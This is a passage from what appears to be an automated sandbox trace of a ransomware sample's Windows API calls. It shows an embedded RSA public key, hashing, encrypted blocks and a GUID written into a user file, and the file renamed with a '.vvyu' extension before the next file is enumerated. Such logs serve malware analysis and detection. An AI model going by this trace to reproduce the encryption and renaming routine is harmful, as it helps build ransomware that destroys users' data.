KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.105] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.106] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.106] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.106] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.106] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.106] GetLastError () returned 0x0 [0193.107] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.107] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.107] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.107] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.107] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.107] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3cd8 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3d20 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.108] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6278 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6260 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0193.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.111] GetCurrentThreadId () returned 0x5d8 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae77b8 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.112] GetCurrentThreadId () returned 0x5d8 [0193.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0193.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0193.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6278 [0193.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0193.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62d8 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62f0 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6290 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6260 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0193.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0193.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3d20 | out: hHeap=0x2c0000) returned 1 [0193.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.122] WriteFile (in: hFile=0x584, lpBuffer=0x2adfe08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2adfe08*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0193.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.123] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.123] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0193.124] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.125] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.125] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.125] CloseHandle (hObject=0x584) returned 1 [0193.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0193.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.127] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url.vvyu")) returned 1 [0193.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.128] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0193.131] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0193.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0193.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.131] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0193.131] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 